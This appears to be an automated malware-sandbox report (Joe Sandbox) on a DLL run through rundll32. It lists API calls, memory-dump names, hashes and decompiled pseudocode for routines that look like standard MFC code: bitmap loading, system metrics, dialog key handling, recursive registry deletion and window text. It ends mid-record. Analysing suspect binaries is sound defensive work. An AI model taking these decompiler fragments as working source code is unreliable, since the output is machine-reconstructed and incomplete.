                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000b3e8
                                                                                                                                                                            0x1000b3eb
                                                                                                                                                                            0x1000b3ef
                                                                                                                                                                            0x1000b3ef
                                                                                                                                                                            0x1000b3f0
                                                                                                                                                                            0x1000b3f3
                                                                                                                                                                            0x1000b3f4
                                                                                                                                                                            0x1000b3f6
                                                                                                                                                                            0x1000b3f9
                                                                                                                                                                            0x1000b3fe
                                                                                                                                                                            0x1000b402
                                                                                                                                                                            0x1000b405
                                                                                                                                                                            0x1000b407
                                                                                                                                                                            0x1000b40c
                                                                                                                                                                            0x1000b410
                                                                                                                                                                            0x1000b410
                                                                                                                                                                            0x1000b413
                                                                                                                                                                            0x1000b416
                                                                                                                                                                            0x1000b418
                                                                                                                                                                            0x1000b418
                                                                                                                                                                            0x1000b429
                                                                                                                                                                            0x1000b431
                                                                                                                                                                            0x1000b439
                                                                                                                                                                            0x1000b43c
                                                                                                                                                                            0x1000b43f
                                                                                                                                                                            0x1000b443
                                                                                                                                                                            0x1000b448
                                                                                                                                                                            0x1000b44b
                                                                                                                                                                            0x1000b452
                                                                                                                                                                            0x1000b452
                                                                                                                                                                            0x1000b456
                                                                                                                                                                            0x1000b458
                                                                                                                                                                            0x1000b45b
                                                                                                                                                                            0x1000b45f
                                                                                                                                                                            0x1000b462
                                                                                                                                                                            0x1000b464
                                                                                                                                                                            0x1000b467
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46f
                                                                                                                                                                            0x1000b47b
                                                                                                                                                                            0x1000b483
                                                                                                                                                                            0x1000b484
                                                                                                                                                                            0x1000b485
                                                                                                                                                                            0x1000b48a
                                                                                                                                                                            0x1000b48b
                                                                                                                                                                            0x1000b493
                                                                                                                                                                            0x1000b499
                                                                                                                                                                            0x1000b499
                                                                                                                                                                            0x1000b49e
                                                                                                                                                                            0x1000b4a1
                                                                                                                                                                            0x1000b4a3
                                                                                                                                                                            0x1000b4a8
                                                                                                                                                                            0x1000b4ab
                                                                                                                                                                            0x1000b4ab
                                                                                                                                                                            0x1000b4ac
                                                                                                                                                                            0x1000b4ac

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
                                                                                                                                                                            • _memset.LIBCMT ref: 1000B429
                                                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
                                                                                                                                                                            • LoadBitmapA.USER32 ref: 1000B493
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                                                                                            • Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                                                                                            • Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
                                                                                                                                                                            • Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                            				void _v20;
                                                                                                                                                                            				int _t14;
                                                                                                                                                                            				int _t18;
                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				if(E1000D6C3() == 0) {
                                                                                                                                                                            					if(_a4 != 0x12340042) {
                                                                                                                                                                            						L9:
                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _t14;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t23 = _a8;
                                                                                                                                                                            					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                            						_t18 = GetSystemMetrics(1);
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						 *(_t23 + 0x10) = _t18;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                                                                                            						if( *_t23 >= 0x48) {
                                                                                                                                                                            							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t14 = 1;
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return  *0x1005a760(_a4, _a8);
                                                                                                                                                                            			}








                                                                                                                                                                            0x1000d87c
                                                                                                                                                                            0x1000d895
                                                                                                                                                                            0x1000d900
                                                                                                                                                                            0x1000d900
                                                                                                                                                                            0x1000d902
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d903
                                                                                                                                                                            0x1000d897
                                                                                                                                                                            0x1000d89e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d8b7
                                                                                                                                                                            0x1000d8b8
                                                                                                                                                                            0x1000d8bb
                                                                                                                                                                            0x1000d8c9
                                                                                                                                                                            0x1000d8cc
                                                                                                                                                                            0x1000d8d4
                                                                                                                                                                            0x1000d8d5
                                                                                                                                                                            0x1000d8d6
                                                                                                                                                                            0x1000d8d7
                                                                                                                                                                            0x1000d8de
                                                                                                                                                                            0x1000d8e1
                                                                                                                                                                            0x1000d8e5
                                                                                                                                                                            0x1000d8f4
                                                                                                                                                                            0x1000d8f9
                                                                                                                                                                            0x1000d8fc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d8fc
                                                                                                                                                                            0x1000d89e
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000D8C5
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000D8CC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                                                                                            • String ID: B$DISPLAY
                                                                                                                                                                            • API String ID: 3136151823-3316187204
                                                                                                                                                                            • Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                                                                                            • Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
                                                                                                                                                                            • Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				struct HWND__* _t10;
                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                            				struct HWND__* _t14;
                                                                                                                                                                            				struct HWND__* _t15;
                                                                                                                                                                            				int _t19;
                                                                                                                                                                            				void* _t21;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				struct HWND__** _t26;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				_t26 = _a4;
                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                            				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
                                                                                                                                                                            					_t10 = E1001040B(__ecx);
                                                                                                                                                                            					__eflags = _t10;
                                                                                                                                                                            					if(_t10 == 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						__eflags = _t26[1] - 0x100;
                                                                                                                                                                            						if(_t26[1] != 0x100) {
                                                                                                                                                                            							L13:
                                                                                                                                                                            							return E1000E426(_t26);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t12 = _t26[2];
                                                                                                                                                                            						__eflags = _t12 - 0x1b;
                                                                                                                                                                            						if(_t12 == 0x1b) {
                                                                                                                                                                            							L8:
                                                                                                                                                                            							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                                                                                            							__eflags = _t14;
                                                                                                                                                                            							if(_t14 == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                                                                                            							__eflags = _t15;
                                                                                                                                                                            							if(_t15 == 0) {
                                                                                                                                                                            								L12:
                                                                                                                                                                            								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t19 = IsWindowEnabled(_t15);
                                                                                                                                                                            							__eflags = _t19;
                                                                                                                                                                            							if(_t19 == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t12 - 3;
                                                                                                                                                                            						if(_t12 != 3) {
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t10 + 0x68);
                                                                                                                                                                            					if( *(_t10 + 0x68) == 0) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1000c570
                                                                                                                                                                            0x1000c570
                                                                                                                                                                            0x1000c572
                                                                                                                                                                            0x1000c577
                                                                                                                                                                            0x1000c580
                                                                                                                                                                            0x1000c589
                                                                                                                                                                            0x1000c58e
                                                                                                                                                                            0x1000c590
                                                                                                                                                                            0x1000c59c
                                                                                                                                                                            0x1000c59c
                                                                                                                                                                            0x1000c5a3
                                                                                                                                                                            0x1000c5fe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c601
                                                                                                                                                                            0x1000c5a5
                                                                                                                                                                            0x1000c5a8
                                                                                                                                                                            0x1000c5ab
                                                                                                                                                                            0x1000c5b2
                                                                                                                                                                            0x1000c5bc
                                                                                                                                                                            0x1000c5be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5c7
                                                                                                                                                                            0x1000c5cc
                                                                                                                                                                            0x1000c5ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5d5
                                                                                                                                                                            0x1000c5db
                                                                                                                                                                            0x1000c5dd
                                                                                                                                                                            0x1000c5ea
                                                                                                                                                                            0x1000c5f6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5f6
                                                                                                                                                                            0x1000c5e0
                                                                                                                                                                            0x1000c5e6
                                                                                                                                                                            0x1000c5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5e8
                                                                                                                                                                            0x1000c5ad
                                                                                                                                                                            0x1000c5b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5b0
                                                                                                                                                                            0x1000c592
                                                                                                                                                                            0x1000c596
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c598
                                                                                                                                                                            0x1000c582
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Edit
                                                                                                                                                                            • API String ID: 0-554135844
                                                                                                                                                                            • Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                                                                                            • Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
                                                                                                                                                                            • Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                                                                                            • Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                            				void* _t32;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				char** _t54;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				char* _t59;
                                                                                                                                                                            				void* _t61;
                                                                                                                                                                            
                                                                                                                                                                            				_t42 = __ebx;
                                                                                                                                                                            				_t59 = _t61 - 0x104;
                                                                                                                                                                            				_t25 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_t59[0x108] = _t25 ^ _t59;
                                                                                                                                                                            				_push(0x18);
                                                                                                                                                                            				E10017BF4(E10027F23, __ebx, __edi, __esi);
                                                                                                                                                                            				_t54 = _t59[0x118];
                                                                                                                                                                            				_t44 = _t59[0x114];
                                                                                                                                                                            				_t52 = _t59 - 0x18;
                                                                                                                                                                            				 *(_t59 - 0x20) = _t44;
                                                                                                                                                                            				 *(_t59 - 0x1c) = _t54;
                                                                                                                                                                            				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                                                                                                                                            				_t57 = _t30;
                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                                                                                                                                            						_t57 = _t34;
                                                                                                                                                                            						_t66 = _t57;
                                                                                                                                                                            						if(_t57 != 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                                                                                                                                            						_push(_t59);
                                                                                                                                                                            						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                                                                                                                                            						 *(_t59 - 4) = 1;
                                                                                                                                                                            						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                                                                                                                                            						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                                                                                                                                            						 *(_t59 - 4) = 0;
                                                                                                                                                                            						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                                                                                                                                            						if(_t42 == 0) {
                                                                                                                                                                            							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t57 - 0x103;
                                                                                                                                                                            					if(_t57 == 0x103) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t57 - 0x3f2;
                                                                                                                                                                            						if(_t57 == 0x3f2) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					RegCloseKey( *(_t59 - 0x18));
                                                                                                                                                                            				}
                                                                                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                                                                                                            				_pop(_t55);
                                                                                                                                                                            				_pop(_t58);
                                                                                                                                                                            				_pop(_t43);
                                                                                                                                                                            				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                                                                                                                                            				__eflags =  &(_t59[0x10c]);
                                                                                                                                                                            				return _t32;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000bc89
                                                                                                                                                                            0x1000bc90
                                                                                                                                                                            0x1000bc94
                                                                                                                                                                            0x1000bc9b
                                                                                                                                                                            0x1000bca1
                                                                                                                                                                            0x1000bca8
                                                                                                                                                                            0x1000bcad
                                                                                                                                                                            0x1000bcb5
                                                                                                                                                                            0x1000bcbb
                                                                                                                                                                            0x1000bcc1
                                                                                                                                                                            0x1000bcc4
                                                                                                                                                                            0x1000bcc7
                                                                                                                                                                            0x1000bccd
                                                                                                                                                                            0x1000bcd1
                                                                                                                                                                            0x1000bcd7
                                                                                                                                                                            0x1000bce5
                                                                                                                                                                            0x1000bceb
                                                                                                                                                                            0x1000bced
                                                                                                                                                                            0x1000bcef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bcf1
                                                                                                                                                                            0x1000bcf7
                                                                                                                                                                            0x1000bcfb
                                                                                                                                                                            0x1000bd07
                                                                                                                                                                            0x1000bd13
                                                                                                                                                                            0x1000bd17
                                                                                                                                                                            0x1000bd1d
                                                                                                                                                                            0x1000bd21
                                                                                                                                                                            0x1000bd28
                                                                                                                                                                            0x1000bd2a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd2a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd28
                                                                                                                                                                            0x1000bd4b
                                                                                                                                                                            0x1000bd51
                                                                                                                                                                            0x1000bd5b
                                                                                                                                                                            0x1000bd66
                                                                                                                                                                            0x1000bd53
                                                                                                                                                                            0x1000bd53
                                                                                                                                                                            0x1000bd59
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd59
                                                                                                                                                                            0x1000bd6b
                                                                                                                                                                            0x1000bd6b
                                                                                                                                                                            0x1000bd76
                                                                                                                                                                            0x1000bd7e
                                                                                                                                                                            0x1000bd7f
                                                                                                                                                                            0x1000bd80
                                                                                                                                                                            0x1000bd89
                                                                                                                                                                            0x1000bd8e
                                                                                                                                                                            0x1000bd95

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000BCA8
                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000BD6B
                                                                                                                                                                              • Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 301487041-0
                                                                                                                                                                            • Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                                                                                            • Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
                                                                                                                                                                            • Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v263;
                                                                                                                                                                            				char _v264;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				int _t27;
                                                                                                                                                                            				CHAR* _t28;
                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                            				_t9 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t9 ^ _t29;
                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                            				_t32 = _t21;
                                                                                                                                                                            				_t28 = _a8;
                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t27 = lstrlenA(_t28);
                                                                                                                                                                            				_v264 = 0;
                                                                                                                                                                            				E100174D0(_t27,  &_v263, 0, 0xff);
                                                                                                                                                                            				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                                                                                            					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                                                                                            			}


















                                                                                                                                                                            0x10013f9e
                                                                                                                                                                            0x10013f9e
                                                                                                                                                                            0x10013fa7
                                                                                                                                                                            0x10013fae
                                                                                                                                                                            0x10013fb2
                                                                                                                                                                            0x10013fb5
                                                                                                                                                                            0x10013fb8
                                                                                                                                                                            0x10013fbc
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fc5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013fd3
                                                                                                                                                                            0x10013fde
                                                                                                                                                                            0x10013fe5
                                                                                                                                                                            0x10013ff4
                                                                                                                                                                            0x1001401d
                                                                                                                                                                            0x1001401d
                                                                                                                                                                            0x10014031

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
                                                                                                                                                                            • _memset.LIBCMT ref: 10013FE5
                                                                                                                                                                            • GetWindowTextA.USER32 ref: 10013FFF
                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10014011
                                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 1001401D
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4273134663-0
                                                                                                                                                                            • Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                                                                                            • Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
